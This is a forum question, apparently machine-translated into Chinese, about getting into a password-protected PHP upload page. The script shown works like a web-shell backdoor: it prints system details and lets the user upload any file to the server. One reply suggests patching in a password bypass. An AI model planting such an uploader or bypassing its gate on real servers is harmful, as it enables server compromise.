我在Linux服務器上有一個PHP腳本,我可以在瀏覽器上顯示它,這個腳本告訴我必須輸入密碼才能登錄(上傳腳本)。 這是PHP代碼:輸入正確的密碼登錄php
<?php
session_start();
if($_SESSION["adm"]){
echo '<b>Namesis<br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if($_POST['_upl'] == "Upload") {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
echo '<b>Upload Success !!!</b><br><br>';
} else {
echo '<b>Upload Fail !!!</b><br><br>';
}
}
}
if($_POST["p"]) {
$p = $_POST["p"];
$pa = md5(sha1($p));
if($pa=="0cc175b9c0f1b6a831c399e269772661") {
$_SESSION["adm"] = 1;
}
}
?>
<form action="" method="post">
<input type="text" name="p">
</form>
我看到密碼是MD5;當我解密這個0cc175b9c0f1b6a831c399e269772661
時,我發現結果是「`a`」 ,但是當我輸入「`a`」密碼時,腳本不能成功登錄。 我試過upload.php?p=a
和upload.pph?p=0cc175b9c0f1b6a831c399e269772661
,沒有任何變化。
請如何登錄此腳本。我很擔心。
0cc175b9c0f1b6a831c399e269772661是經過MD5 SHA1相當於到密碼,你必須要社交工程師來找到它的確切值 - 你應該增加一個|| $ pas ='newvalue'作爲tempwelvale直到你記得你通過 – KDOT
你能否解釋更多請cuz我已經嘗試過了''a''「密碼並且stil它錯了或者沒有被seccssefuly鎖在 – walidz
難道你不問開發者的頁面?所有哈希硬編碼後,以防止未經授權的訪問。 – martinstoeckli